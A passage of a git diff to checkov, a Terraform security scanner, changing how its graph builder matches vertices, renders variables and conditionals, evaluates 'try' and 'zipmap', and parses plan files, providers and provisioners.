                     cross_variable_edges: bool = False) -> bool:
         if origin_vertex_index == dest_vertex_index:
@@ -382,7 +557,7 @@ def _find_vertex_index_relative_to_path(
             module_dependency_by_name_key = vertex.source_module_object
 
         # important to use this specific map for big graph performance
-        possible_vertices = self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name, [])
+        possible_vertices = self._get_possible_vertices(module_dependency_by_name_key, block_type, name)
         for vertex_index in possible_vertices:
             vertex = self.vertices[vertex_index]
             if self.get_dirname(vertex.path) == self.get_dirname(block_path):
@@ -394,23 +569,70 @@ def _find_vertex_index_relative_to_path(
             relative_vertex = self._find_vertex_with_best_match(relative_vertices, block_path, origin_vertex_index)
         return relative_vertex
 
+    def _get_possible_vertices(self, module_dependency_by_name_key: TFModule | None, block_type: str, name: str) -> list[int]:
+        possible_vertices = self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name, [])
+        if possible_vertices:
+            return possible_vertices
+        return self.vertices_by_module_dependency_by_name.get(module_dependency_by_name_key, {}).get(block_type, {}).get(name.replace(LEFT_BRACKET_WITH_QUOTATION, LEFT_BRACKET).replace(RIGHT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET), [])
+
     def _find_vertex_with_best_match(self, relevant_vertices_indexes: List[int], origin_path: str,
                                      origin_vertex_index: Optional[int] = None) -> int:
         vertex_index_with_longest_common_prefix = -1
         longest_common_prefix = ""
+        vertices_with_longest_common_prefix = []
+        origin_real_path = os.path.realpath(origin_path)
         for vertex_index in relevant_vertices_indexes:
             vertex = self.vertices[vertex_index]
-            common_prefix = os.path.commonpath([os.path.realpath(vertex.path), os.path.realpath(origin_path)])
-            if len(common_prefix) > len(longest_common_prefix):
-                vertex_index_with_longest_common_prefix = vertex_index
-                longest_common_prefix = common_prefix
-            elif len(common_prefix) == len(longest_common_prefix) and origin_vertex_index:
+            if vertex.path in self._vertex_path_to_realpath_cache:
+                # Using cache to make sure performance stays stable
+                vertex_realpath = self._vertex_path_to_realpath_cache[vertex.path]
+            else:
+                vertex_realpath = os.path.realpath(vertex.path)
+                self._vertex_path_to_realpath_cache[vertex.path] = vertex_realpath
+            common_prefix = os.path.commonpath([vertex_realpath, origin_real_path])
+
+            # checks if module name is same for dest and origin vertex.
+            if origin_vertex_index is not None:
                 vertex_module_name = vertex.attributes.get(CustomAttributes.TF_RESOURCE_ADDRESS, '')
                 origin_module_name = self.vertices[origin_vertex_index].attributes.get(CustomAttributes.TF_RESOURCE_ADDRESS, '')
                 if vertex_module_name.startswith(BlockType.MODULE) and origin_module_name.startswith(BlockType.MODULE):
                     split_module_name = vertex_module_name.split('.')[1]
                     if origin_module_name.startswith(f'{BlockType.MODULE}.{split_module_name}'):
-                        vertex_index_with_longest_common_prefix = vertex_index
+                        common_prefix = f"{common_prefix} {BlockType.MODULE}.{split_module_name}"
+
+            if len(common_prefix) > len(longest_common_prefix):
+                vertex_index_with_longest_common_prefix = vertex_index
+                longest_common_prefix = common_prefix
+                vertices_with_longest_common_prefix = [(vertex_index, vertex)]
+            elif len(common_prefix) == len(longest_common_prefix):
+                vertices_with_longest_common_prefix.append((vertex_index, vertex))
+
+        if len(vertices_with_longest_common_prefix) <= 1:
+            return vertex_index_with_longest_common_prefix
+
+        # Try to compare based on foreach attributes if we have more than 1 vertex in the list
+        if origin_vertex_index is not None:
+            return self._find_best_match_based_on_foreach_key(origin_vertex_index, vertices_with_longest_common_prefix,
+                                                              vertex_index_with_longest_common_prefix)
+        return vertex_index_with_longest_common_prefix
+
+    def _find_best_match_based_on_foreach_key(
+            self,
+            origin_vertex_index: int,
+            vertices_with_longest_common_prefix: list[tuple[int, TerraformBlock]],
+            vertex_index_with_longest_common_prefix: int
+    ) -> int:
+        origin_vertex = self.vertices[origin_vertex_index]
+        for vertex_index, vertex in vertices_with_longest_common_prefix:
+            vertex_address = vertex.attributes.get(CustomAttributes.TF_RESOURCE_ADDRESS, '')
+            vertex_foreach_value = vertex.for_each_index
+            origin_address = origin_vertex.attributes.get(CustomAttributes.TF_RESOURCE_ADDRESS, '')
+            origin_foreach_value = origin_vertex.for_each_index
+            if origin_foreach_value == vertex_foreach_value and origin_address != '' and \
+                    get_terraform_foreach_or_count_key(origin_address) == \
+                    get_terraform_foreach_or_count_key(vertex_address):
+                return vertex_index
+
         return vertex_index_with_longest_common_prefix
 
     def get_vertices_hash_codes_to_attributes_map(self) -> Dict[str, Dict[str, Any]]:
@@ -667,7 +889,8 @@ def update_list_attribute(
 
     if len(key_parts) == 1:
         idx = force_int(key_parts[0])
-        inner_config = config[0]
+        # Avoid changing the config and cause side effects
+        inner_config = pickle_deepcopy(config[0])
 
         if idx is not None and isinstance(inner_config, list):
             if not inner_config:
@@ -675,7 +898,7 @@ def update_list_attribute(
                 return config
 
             inner_config[idx] = new_value
-            return config
+            return [inner_config]
     entry_to_update = int(key_parts[0]) if key_parts[0].isnumeric() else -1
     for i, config_value in enumerate(config):
         if entry_to_update == -1:
@@ -687,4 +910,5 @@ def update_list_attribute(
 
 
 def get_vertex_as_tf_module(block: TerraformBlock) -> TFModule:
-    return TFModule(block.path, block.name, block.source_module_object)
+    block_name = get_sanitized_terraform_resource_id(block.name)
+    return TFModule(path=block.path, name=block_name, nested_tf_module=block.source_module_object, foreach_idx=block.for_each_index)
diff --git a/checkov/terraform/graph_builder/utils.py b/checkov/terraform/graph_builder/utils.py
index 66918d964b5..c4f3b7318b6 100644
--- a/checkov/terraform/graph_builder/utils.py
+++ b/checkov/terraform/graph_builder/utils.py
@@ -173,6 +173,11 @@ def remove_index_pattern_from_str(str_value: str) -> str:
         # otherwise it can't be accessed via index
         return str_value
 
+    # Workaround for cases where the string value contains a map attribute access for foreach data block
+    # UT for this - `test_foreach_data_with_resource` -> /variable_rendering/test_foreach_renderer.py
+    if "data." in str_value:
+        return str_value
+
     str_value = re.sub(INDEX_PATTERN, "", str_value)
     str_value = str_value.replace('["', CHECKOV_LOREM_IPSUM_VAL).replace("[", " [ ").replace(CHECKOV_LOREM_IPSUM_VAL, '["')
     str_value = str_value.replace('"]', CHECKOV_LOREM_IPSUM_VAL).replace("]", " ] ").replace(CHECKOV_LOREM_IPSUM_VAL, '"]')
@@ -258,7 +263,6 @@ def get_referenced_vertices_in_str_value(
 
         str_value = remove_function_calls_from_str(str_value=str_value)
         str_value = remove_index_pattern_from_str(str_value=str_value)
-        str_value = replace_map_attribute_access_with_dot(str_value=str_value)
         str_value = remove_interpolation(str_value=str_value)
 
         references_vertices = get_vertices_references(str_value, aliases, resources_types)
diff --git a/checkov/terraform/graph_builder/variable_rendering/evaluate_terraform.py b/checkov/terraform/graph_builder/variable_rendering/evaluate_terraform.py
index 350ee80d005..c84f85c2f98 100644
--- a/checkov/terraform/graph_builder/variable_rendering/evaluate_terraform.py
+++ b/checkov/terraform/graph_builder/variable_rendering/evaluate_terraform.py
@@ -56,6 +56,7 @@ def evaluate_terraform(input_str: Any, keep_interpolations: bool = True) -> Any:
     evaluated_value = evaluate_list_access(evaluated_value)
     evaluated_value = strip_double_quotes(evaluated_value)
     evaluated_value = evaluate_directives(evaluated_value)
+    evaluated_value = strip_interpolation_marks(evaluated_value)
     evaluated_value = evaluate_conditional_expression(evaluated_value)
     evaluated_value = evaluate_compare(evaluated_value)
     evaluated_value = evaluate_json_types(evaluated_value)
@@ -193,17 +194,30 @@ def strip_double_quotes(input_str: str) -> str:
     return input_str
 
 
-def evaluate_conditional_expression(input_str: str) -> str:
+def strip_interpolation_marks(input_str: str) -> str:
     if input_str.startswith("${") and input_str.endswith("}"):
-        # just remove the needed char length of the interpolation marks
+        # remove the needed char length of the interpolation marks
         input_str = input_str[2:-1]
+    return input_str
+
+
+def evaluate_conditional_expression(input_str: str) -> str:
+    if input_str.startswith("['${") and input_str.endswith("}']"):
+        condition = find_conditional_expression_groups(input_str[4:-3])
+        if condition is not None:
+            input_str = input_str[4:-3]
+    else:
+        condition = find_conditional_expression_groups(input_str)
+    if condition is None:
+        return input_str
 
-    condition = find_conditional_expression_groups(input_str)
     while condition:
         groups, start, end = condition
         if len(groups) != 3:
             return input_str
-        evaluated_condition = evaluate_terraform(groups[0])
+        evaluated_condition = evaluate_compare(groups[0])
+        if type(evaluated_condition) is str:
+            evaluated_condition = evaluate_terraform(groups[0])
         condition_substr = input_str[start:end]
         bool_evaluated_condition = convert_to_bool(evaluated_condition)
         if bool_evaluated_condition is True:
@@ -395,12 +409,12 @@ def apply_binary_op(a: Optional[Union[str, int, bool]], b: Optional[Union[str, i
     if type_a != type_b:
         try:
             temp_b = type_a(b)  # type:ignore[misc,arg-type]
-            if isinstance(type_a, bool):
+            if isinstance(a, bool) and b:
                 temp_b = bool(convert_to_bool(b))
             return operators[operator](a, temp_b)  # type:ignore[type-var]
         except Exception:
             temp_a = type_b(a)  # type:ignore[misc,arg-type]
-            if isinstance(type_b, bool):
+            if isinstance(b, bool) and a:
                 temp_a = bool(convert_to_bool(a))
             return operators[operator](temp_a, b)  # type:ignore[type-var]
     else:
diff --git a/checkov/terraform/graph_builder/variable_rendering/renderer.py b/checkov/terraform/graph_builder/variable_rendering/renderer.py
index 0215e1901e9..d505be1c88d 100644
--- a/checkov/terraform/graph_builder/variable_rendering/renderer.py
+++ b/checkov/terraform/graph_builder/variable_rendering/renderer.py
@@ -58,6 +58,10 @@
 TYPE_REGEX = re.compile(r'^(\${)?([a-z]+)')
 CHECKOV_RENDER_MAX_LEN = force_int(os.getenv("CHECKOV_RENDER_MAX_LEN", "10000"))
 
+DATA_SPECIAL_KEYWORDS = {
+    "policy_data": "binding"
+}
+
 
 class TerraformVariableRenderer(VariableRenderer["TerraformLocalGraph"]):
     def __init__(self, local_graph: "TerraformLocalGraph") -> None:
@@ -182,6 +186,10 @@ def extract_value_from_vertex(self, key_path: List[str], attributes: Dict[str, A
             value = attributes.get(key, None)
             if value is not None:
                 return value
+            special_key = DATA_SPECIAL_KEYWORDS.get(key, '')
+            value = attributes.get(special_key)
+            if attributes.get('block_type_') == BlockType.DATA and value is not None:
+                return {special_key: value}
 
         if attributes.get(CustomAttributes.BLOCK_TYPE) in (BlockType.VARIABLE, BlockType.TF_VARIABLE):
             var_type = attributes.get('type')
@@ -236,6 +244,8 @@ def find_path_from_referenced_vertices(
                     name = ".".join(copy_of_attribute_path[: i + 1])
                     if vertex_attributes[CustomAttributes.BLOCK_NAME] == name:
                         return attribute_path, vertex_reference.origin_value
+                    elif vertex_attributes[CustomAttributes.BLOCK_NAME] == name.replace(LEFT_BRACKET_WITH_QUOTATION, LEFT_BRACKET).replace(RIGHT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET):
+                        return attribute_path, vertex_reference.origin_value
             elif block_type == BlockType.MODULE:
                 copy_of_attribute_path.reverse()
                 for i, _ in enumerate(copy_of_attribute_path):
@@ -363,6 +373,9 @@ def _process_dynamic_blocks(dynamic_blocks: list[dict[str, Any]] | dict[str, Any
 
             dynamic_arguments: list[str] = []
             TerraformVariableRenderer._extract_dynamic_arguments(block_name, block_content, dynamic_arguments, [])
+            if not dynamic_arguments and len(dynamic_values) == 1:
+                for argument, _ in block_content.items():
+                    dynamic_arguments.append(argument)
             if dynamic_arguments and isinstance(dynamic_values, list):
                 block_confs = []
                 for dynamic_value in dynamic_values:
diff --git a/checkov/terraform/graph_builder/variable_rendering/safe_eval_functions.py b/checkov/terraform/graph_builder/variable_rendering/safe_eval_functions.py
index 6f366bf466f..0c5929ff9d4 100644
--- a/checkov/terraform/graph_builder/variable_rendering/safe_eval_functions.py
+++ b/checkov/terraform/graph_builder/variable_rendering/safe_eval_functions.py
@@ -1,3 +1,5 @@
+from __future__ import annotations
+
 import itertools
 import logging
 import re
@@ -257,9 +259,29 @@ def formatdate(format_str: str, input_str: str) -> str:
     return dt.strftime(processed_format_str)
 
 
+def terraform_try(*args: Any) -> Any:
+    """
+    From terraform docs:
+        "try evaluates all of its argument expressions in turn and returns the result of the first one that does not
+        produce any errors."
+    """
+    for arg in args:
+        try:
+            return evaluate(arg) if isinstance(arg, str) else arg
+        except Exception as e:
+            logging.warning(f"Error in evaluate_try of argument {arg} - {e}")
+            continue
+    raise Exception(f"No argument can be evaluated for try of {args}")
+
+
 SAFE_EVAL_FUNCTIONS: List[str] = []
 SAFE_EVAL_DICT = dict([(k, locals().get(k, None)) for k in SAFE_EVAL_FUNCTIONS])
 
+
+# type conversion functions
+TRY_STR_REPLACEMENT = "__terraform_try__"
+SAFE_EVAL_DICT[TRY_STR_REPLACEMENT] = terraform_try
+
 # math functions
 SAFE_EVAL_DICT["abs"] = abs
 SAFE_EVAL_DICT["ceil"] = ceil
@@ -312,6 +334,7 @@ def formatdate(format_str: str, input_str: str) -> str:
 # SAFE_EVAL_DICT['range']
 SAFE_EVAL_DICT["reverse"] = reverse
 SAFE_EVAL_DICT["sort"] = sort
+SAFE_EVAL_DICT["zipmap"] = lambda *lists: dict(zip(*lists))  # noqa: B905
 
 
 # type conversion
@@ -338,6 +361,12 @@ def evaluate(input_str: str) -> Any:
     if input_str == "...":
         # don't create an Ellipsis object
         return input_str
+    if input_str.startswith("try"):
+        # As `try` is a saved word in python, we can't override it like other functions as `eval` won't accept it.
+        # Instead, we are manually replacing this string with our own custom string, so we can pass it to `eval`.
+
+        # Don't use str.replace to make sure we replace just the first occurrence
+        input_str = f"{TRY_STR_REPLACEMENT}{input_str[3:]}"
     evaluated = eval(input_str, {"__builtins__": None}, SAFE_EVAL_DICT)  # nosec
     return evaluated if not isinstance(evaluated, str) else remove_unicode_null(evaluated)
 
diff --git a/checkov/terraform/image_referencer/provider/aws.py b/checkov/terraform/image_referencer/provider/aws.py
index ff82822d4ed..beb5aa31c85 100644
--- a/checkov/terraform/image_referencer/provider/aws.py
+++ b/checkov/terraform/image_referencer/provider/aws.py
@@ -84,6 +84,38 @@ def extract_images_from_aws_lightsail_container_service_deployment_version(resou
     return image_names
 
 
+def extract_images_from_aws_sagemaker_image_version(resource: dict[str, Any]) -> list[str]:
+    image_names: list[str] = []
+
+    image_name = find_in_dict(input_dict=resource, key_path="base_image")
+    if image_name and isinstance(image_name, str):
+        image_names.append(image_name)
+
+    return image_names
+
+
+def extract_images_from_aws_sagemaker_model(resource: dict[str, Any]) -> list[str]:
+    image_names: list[str] = []
+
+    containers = resource.get("container")
+    if containers:
+        for container in force_list(containers):
+            if isinstance(container, dict):
+                name = container.get("image")
+                if name and isinstance(name, str):
+                    image_names.append(name)
+
+    containers = resource.get("primary_container")
+    if containers:
+        for container in force_list(containers):
+            if isinstance(container, dict):
+                name = container.get("image")
+                if name and isinstance(name, str):
+                    image_names.append(name)
+
+    return image_names
+
+
 # needs to be at the bottom to add the defined functions
 SUPPORTED_AWS_IMAGE_RESOURCE_TYPES = {
     "aws_apprunner_service": extract_images_from_aws_apprunner_service,
@@ -91,4 +123,6 @@ def extract_images_from_aws_lightsail_container_service_deployment_version(resou
     "aws_codebuild_project": extract_images_from_aws_codebuild_project,
     "aws_ecs_task_definition": extract_images_from_aws_ecs_task_definition,
     "aws_lightsail_container_service_deployment_version": extract_images_from_aws_lightsail_container_service_deployment_version,
+    "aws_sagemaker_image_version": extract_images_from_aws_sagemaker_image_version,
+    "aws_sagemaker_model": extract_images_from_aws_sagemaker_model,
 }
diff --git a/checkov/terraform/module_loading/module_finder.py b/checkov/terraform/module_loading/module_finder.py
index be87780b31d..2c618748622 100644
--- a/checkov/terraform/module_loading/module_finder.py
+++ b/checkov/terraform/module_loading/module_finder.py
@@ -51,9 +51,14 @@ def find_modules(path: str) -> List[ModuleDownload]:
                     continue
 
                 curr_md = None
+                comment_out = re.findall(r'/\*.*?\*/', content, re.DOTALL)
                 for line in content.splitlines():
                     if not curr_md:
                         if line.startswith('module'):
+                            in_comment_out = [line for a in comment_out if line in a]
+                            if in_comment_out:
+                                # if the "module " ref in the comment out part
+                                continue
                             curr_md = ModuleDownload(os.path.dirname(os.path.join(root, file_name)))
 
                             # also extract the name for easier mapping against the TF modules.json file
@@ -105,14 +110,15 @@ def load_tf_modules(
     if not modules_to_load:
         modules_to_load = find_modules(path)
 
-    # To avoid duplicate work, we need to get the distinct module sources
-    distinct_modules = list({m.address: m for m in modules_to_load}.values())
+    # load terraform managed modules first, before pulling out distinct modules, as address attribute changes
+    replaced_modules = replace_terraform_managed_modules(path=path, found_modules=modules_to_load)
 
-    replaced_modules = replace_terraform_managed_modules(path=path, found_modules=distinct_modules)
+    # To avoid duplicate work, we need to get the distinct module sources
+    distinct_modules = list({m.address: m for m in replaced_modules}.values())
 
     downloadable_modules = [
         (module_loader_registry, m)
-        for m in replaced_modules if should_download_module(m.module_link)
+        for m in distinct_modules if should_download_module(m.module_link)
     ]
 
     if run_parallel:
diff --git a/checkov/terraform/modules/module_utils.py b/checkov/terraform/modules/module_utils.py
index 5e8a3791d41..98165dd362d 100644
--- a/checkov/terraform/modules/module_utils.py
+++ b/checkov/terraform/modules/module_utils.py
@@ -242,7 +242,7 @@ def get_module_name(file_path: TFDefinitionKey) -> str | None:
     if not file_path.tf_source_modules:
         return None
     module_name = file_path.tf_source_modules.name
-    if file_path.tf_source_modules.foreach_idx:
+    if isinstance(file_path.tf_source_modules.foreach_idx, int) or file_path.tf_source_modules.foreach_idx:
         foreach_or_count = '"' if isinstance(file_path.tf_source_modules.foreach_idx, str) else ''
         module_name = f'{module_name}[{foreach_or_count}{file_path.tf_source_modules.foreach_idx}{foreach_or_count}]'
     return module_name
diff --git a/checkov/terraform/plan_parser.py b/checkov/terraform/plan_parser.py
index c666fe9fc13..7f2b103087d 100644
--- a/checkov/terraform/plan_parser.py
+++ b/checkov/terraform/plan_parser.py
@@ -3,11 +3,12 @@
 import itertools
 import json
 import logging
-from typing import Optional, Tuple, Dict, List, Any, cast
+import os
+from typing import Any, Dict, List, Optional, Tuple, cast
 
 from checkov.common.graph.graph_builder import CustomAttributes
 from checkov.common.parsers.node import ListNode
-from checkov.common.util.consts import LINE_FIELD_NAMES
+from checkov.common.util.consts import LINE_FIELD_NAMES, TRUE_AFTER_UNKNOWN
 from checkov.common.util.type_forcers import force_list
 from checkov.terraform.context_parsers.tf_plan import parse
 
@@ -16,6 +17,7 @@
 TF_PLAN_RESOURCE_CHANGE_ACTIONS = "__change_actions__"
 TF_PLAN_RESOURCE_CHANGE_KEYS = "__change_keys__"
 TF_PLAN_RESOURCE_PROVISIONERS = "provisioners"
+TF_PLAN_RESOURCE_AFTER_UNKNOWN = 'after_unknown'
 
 RESOURCE_TYPES_JSONIFY = {
     "aws_batch_job_definition": "container_properties",
@@ -27,6 +29,45 @@
     "aws_iam_user_policy": "policy",
     "aws_ssoadmin_permission_set_inline_policy": "inline_policy",
     "azurerm_portal_dashboard": "dashboard_properties",
+    "aws_vpc_endpoint_policy": "policy",
+    "aws_ecr_registry_policy": "policy",
+    "aws_acmpca_policy": "policy",
+    "aws_api_gateway_rest_api_policy": "policy",
+    "aws_backup_vault_policy": "policy",
+    "aws_cloudwatch_log_destination_policy": "access_policy",
+    "aws_cloudwatch_log_resource_policy": "policy_document",
+    "aws_oam_sink_policy": "policy",
+    "aws_codebuild_resource_policy": "policy",
+    "aws_dynamodb_resource_policy": "policy",
+    "aws_ecr_repository_policy": "policy",
+    "aws_ecrpublic_repository_policy": "policy",
+    "aws_efs_file_system_policy": "policy",
+    "aws_elasticsearch_domain_policy": "access_policies",
+    "aws_media_store_container_policy": "policy",
+    "aws_cloudwatch_event_bus_policy": "policy",
+    "aws_schemas_registry_policy": "policy",
+    "aws_glue_resource_policy": "policy",
+    "aws_iot_policy": "policy",
+    "aws_kms_key": "policy",
+    "aws_kinesis_resource_policy": "policy",
+    "aws_msk_cluster_policy": "policy",
+    "aws_networkfirewall_resource_policy": "policy",
+    "aws_opensearch_domain_policy": "access_policies",
+    "aws_opensearchserverless_access_policy": "policy",
+    "aws_redshift_resource_policy": "policy",
+    "aws_redshiftserverless_resource_policy": "policy",
+    "aws_s3_bucket_policy": "policy",
+    "aws_s3control_access_point_policy": "policy",
+    "aws_s3control_bucket_policy": "policy",
+    "aws_ses_identity_policy": "policy",
+    "aws_sesv2_email_identity_policy": "policy",
+    "aws_sns_topic_data_protection_policy": "policy",
+    "aws_sns_topic_policy": "policy",
+    "aws_sqs_queue_policy": "policy",
+    "aws_secretsmanager_secret_policy": "policy",
+    "aws_vpclattice_auth_policy": "policy",
+    "aws_vpclattice_resource_policy": "policy",
+    "google_project_iam_policy": "policy_data"
 }
 
 
@@ -161,10 +202,12 @@ def _prepare_resource_block(
         resource_address: str | None = resource.get("address")
         resource_conf[TF_PLAN_RESOURCE_ADDRESS] = resource_address  # type:ignore[assignment]  # special field
 
-        changes = resource_changes.get(resource_address)  # type:ignore[arg-type]  # becaus eit can be None
+        changes = resource_changes.get(resource_address)  # type:ignore[arg-type]  # because it can be None
         if changes:
             resource_conf[TF_PLAN_RESOURCE_CHANGE_ACTIONS] = changes.get("change", {}).get("actions") or []
             resource_conf[TF_PLAN_RESOURCE_CHANGE_KEYS] = changes.get(TF_PLAN_RESOURCE_CHANGE_KEYS) or []
+            # enrich conf with after_unknown values
+            _eval_after_unknown(changes, resource_conf)
 
         provisioners = conf.get(TF_PLAN_RESOURCE_PROVISIONERS) if conf else None
         if provisioners:
@@ -175,6 +218,22 @@ def _prepare_resource_block(
     return resource_block, block_type, prepared
 
 
+def _eval_after_unknown(changes: dict[str, Any], resource_conf: dict[str, Any]) -> None:
+    after_unknown = changes.get("change", {}).get(TF_PLAN_RESOURCE_AFTER_UNKNOWN)
+    if os.getenv('EVAL_TF_PLAN_AFTER_UNKNOWN') and after_unknown and isinstance(after_unknown, dict):
+        for k, v in after_unknown.items():
+            # We check if the value of the field is True. That would mean its value is known after the apply
+            # We also check whether the field is not already present in the conf since we do not want to
+            # override it. Overriding can actually cause losing its value
+            if v is True and k not in resource_conf:
+                # We set the value to 'true_after_unknown' and not its original value
+                # We need to set a constant other than a boolean (True/"true"),
+                # so it will not collide with actual possible values of those attributes
+                # In these cases, policies checking the existence of a value will succeed,
+                # but policies checking for concrete values will fail
+                resource_conf[k] = _clean_simple_type_list([TRUE_AFTER_UNKNOWN])
+
+
 def _find_child_modules(
     child_modules: ListNode, resource_changes: dict[str, dict[str, Any]], root_module_conf: dict[str, Any]
 ) -> dict[str, list[dict[str, dict[str, Any]]]]:
@@ -212,7 +271,7 @@ def _find_child_modules(
                     (
                         module_call_resource
                         for module_call_resource in module_call_resources
-                        if f"{module_address}.{module_call_resource['address']}" == resource["address"]
+                        if f"{module_address}.{module_call_resource['address']}" == (resource["address"].rsplit('[', 1)[0] if resource["address"][-1] == "]" else resource["address"])
                     ),
                     None
                 )
@@ -242,6 +301,33 @@ def _get_module_call_resources(module_address: str, root_module_conf: dict[str,
     return cast("list[dict[str, Any]]", root_module_conf.get("resources", []))
 
 
+def _is_provider_key(key: str) -> bool:
+    """key is a valid provider"""
+    return (key.startswith('module.') or key.startswith('__') or key in {'start_line', 'end_line'})
+
+
+def _get_provider(template: dict[str, dict[str, Any]]) -> dict[str, dict[str, Any]]:
+    """Returns the provider dict"""
+
+    provider_map: dict[str, dict[str, Any]] = {}
+    provider_config = template.get("configuration", {}).get("provider_config")
+
+    if provider_config and isinstance(provider_config, dict):
+        for provider_key, provider_data in provider_config.items():
+            if _is_provider_key(key=provider_key):
+                # Not a provider, skip
+                continue
+            provider_map[provider_key] = {}
+            for field, value in provider_data.get('expressions', {}).items():
+                if field in LINE_FIELD_NAMES or not isinstance(value, dict):
+                    continue  # don't care about line #s or non dicts
+                expression_value = value.get('constant_value', None)
+                if expression_value:
+                    provider_map[provider_key][field] = expression_value
+
+    return provider_map
+
+
 def _get_resource_changes(template: dict[str, Any]) -> dict[str, dict[str, Any]]:
     """Returns a resource address to resource changes dict"""
 
@@ -293,11 +379,15 @@ def parse_tf_plan(tf_plan_file: str, out_parsing_errors: Dict[str, str]) -> Tupl
     :type tf_plan_file: str - path to plan file
     :rtype: tf_definition dictionary and template_lines of the plan file
     """
-    tf_definition: Dict[str, Any] = {"resource": [], "data": []}
+    tf_definition: Dict[str, Any] = {"provider": [], "resource": [], "data": []}
     template, template_lines = parse(tf_plan_file, out_parsing_errors)
     if not template:
         return None, None
 
+    provider = _get_provider(template=template)
+    if bool(provider):
+        tf_definition["provider"].append(provider)
+
     resource_changes = _get_resource_changes(template=template)
 
     for resource in template.get("planned_values", {}).get("root_module", {}).get("resources", []):
@@ -349,13 +439,27 @@ def _clean_simple_type_list(value_list: List[Any]) -> List[Any]:
     return value_list
 
 
-def _get_provisioner(input_data: List[Any]) -> List[Any]:
+def _get_provisioner(input_data: List[Dict[str, Any]]) -> List[Dict[str, Dict[str, Any]]]:
     result = []
     for item in input_data:
-        key = item['type']
-        command_value = item['expressions']['command']
-        if not isinstance(command_value, list):
-            command_value = [command_value]
-        transformed_item = {key: {'command': command_value}}
-        result.append(transformed_item)
+        if 'type' in item and 'expressions' in item:
+            key = item['type']
+            expressions = item['expressions']
+            transformed_expressions = {}
+
+            if key == 'local-exec':
+                if 'command' in expressions:
+                    command_value = expressions['command']
+                    if not isinstance(command_value, list):
+                        command_value = [command_value]
+                    transformed_expressions['command'] = command_value
+
+                for field, value in expressions.items():
+                    if field != 'command':
+                        transformed_expressions[field] = value
+            else:
+                transformed_expressions = expressions
+
+            transformed_item = {key: transformed_expressions}
+            result.append(transformed_item)
     return result
diff --git a/checkov/terraform/runner.py b/checkov/terraform/runner.py
index 02581dab9d4..7135be36545 100644
--- a/checkov/terraform/runner.py
+++ b/checkov/terraform/runner.py
@@ -362,7 +362,7 @@ def run_block(
                         logging.warning(f"Failed to get module name for resource {entity_id}. {str(e)}")
                         continue
                     module_name = full_definition_path[module_name_index]
-                caller_context = definition_context[module_full_path].get(BlockType.MODULE, {}).get(module_name)
+                caller_context = definition_context.get(module_full_path, {}).get(BlockType.MODULE, {}).get(module_name)
                 if not caller_context:
                     continue
                 caller_file_line_range = (caller_context.get("start_line", 1), caller_context.get("end_line", 1))
diff --git a/checkov/terraform/tf_parser.py b/checkov/terraform/tf_parser.py
index 9be746d5950..2f8893286c4 100644
--- a/checkov/terraform/tf_parser.py
+++ b/checkov/terraform/tf_parser.py
@@ -48,6 +48,7 @@ def __init__(self, module_class: type[Module] = Module) -> None:
         self.module_address_map: Dict[Tuple[str, str], str] = {}
         self.loaded_files_map: dict[str, dict[str, list[dict[str, Any]]] | None] = {}
         self.external_variables_data: list[tuple[str, Any, str]] = []
+        self.temp_tf_definition: dict[str, Any] = {}
 
     def _init(self, directory: str,
               out_evaluations_context: Dict[TFDefinitionKey, Dict[str, EvaluationContext]] | None,
@@ -461,6 +462,7 @@ def parse_hcl_module_from_tf_definitions(
         )
         self.add_tfvars(module, source)
         copy_of_tf_definitions = pickle_deepcopy(tf_definitions)
+        module.temp_tf_definition = tf_definitions  # type:ignore  # will be TFDefinitionKey and not string
         for file_path, blocks in copy_of_tf_definitions.items():
             for block_type in blocks:
                 try:
@@ -699,13 +701,15 @@ def load_or_die_quietly(
     file: str | Path | os.DirEntry[str], parsing_errors: dict[str, Exception], clean_definitions: bool = True
 ) -> Optional[_Hcl2Payload]:
     """
-Load JSON or HCL, depending on filename.
+    Load JSON or HCL, depending on filename.
     :return: None if the file can't be loaded
     """
-
     file_path = os.fspath(file)
     file_name = os.path.basename(file_path)
 
+    if file_name.endswith('.tfvars'):
+        clean_definitions = False
+
     try:
         logging.debug(f"Parsing {file_path}")
 
diff --git a/checkov/terraform_json/parser.py b/checkov/terraform_json/parser.py
index f355c0442d4..43ce1d811bc 100644
--- a/checkov/terraform_json/parser.py
+++ b/checkov/terraform_json/parser.py
@@ -65,9 +65,6 @@ def loads(file_path: Path) -> tuple[dict[str, Any], list[tuple[int, str]]]:
 
     content = read_file_with_any_encoding(file_path=file_path)
 
-    if not all(key in content for key in ("resource", "provider")):
-        return {}, []
-
     file_lines = [(idx + 1, line) for idx, line in enumerate(content.splitlines(keepends=True))]
 
     template: "dict[str, Any] | list[dict[str, Any]]" = loader.loads(content=content)
@@ -89,27 +86,37 @@ def prepare_definition(definition: dict[str, Any]) -> dict[str, Any]:
         if block_type == COMMENT_FIELD_NAME or block_type in LINE_FIELD_NAMES:
             continue
 
-        definition_new[block_type] = []
-        for block_name, config in blocks.items():
-            if block_name == COMMENT_FIELD_NAME or block_name in LINE_FIELD_NAMES:
-                continue
-
-            if block_type in (BlockType.RESOURCE, BlockType.DATA):
-                # data/resource have an extra nested level resource_type -> resource_name -> resource_config
-                for resource_name, resource_config in config.items():
-                    if resource_name in IGNORE_FILED_NAMES:
-                        continue
-                    definition_new[block_type].append({block_name: {resource_name: hclify(obj=resource_config)}})
-            elif block_type == BlockType.PROVIDER:
-                # provider are stored as a list, which we need to move one level higher to add the name
-                for provider_config in config:
-                    definition_new[block_type].append({block_name: hclify(obj=provider_config)})
-            else:
-                definition_new[block_type].append({block_name: hclify(obj=config)})
+        definition_new[block_type] = handle_block_type(block_type=block_type, blocks=blocks)
 
     return definition_new
 
 
+def handle_block_type(block_type: str, blocks: dict[str, Any]) -> list[dict[str, Any]]:
+    result: list[dict[str, Any]] = []
+
+    for block_name, config in blocks.items():
+        if block_name == COMMENT_FIELD_NAME or block_name in LINE_FIELD_NAMES:
+            continue
+
+        if block_type in (BlockType.RESOURCE, BlockType.DATA):
+            # data/resource have an extra nested level resource_type -> resource_name -> resource_config
+            for resource_name, resource_config in config.items():
+                if resource_name in IGNORE_FILED_NAMES:
+                    continue
+                result.append({block_name: {resource_name: hclify(obj=resource_config)}})
+        elif block_type == BlockType.PROVIDER:
+            # provider are stored as a list, which we need to move one level higher to add the name
+            for provider_config in config:
+                result.append({block_name: hclify(obj=provider_config)})
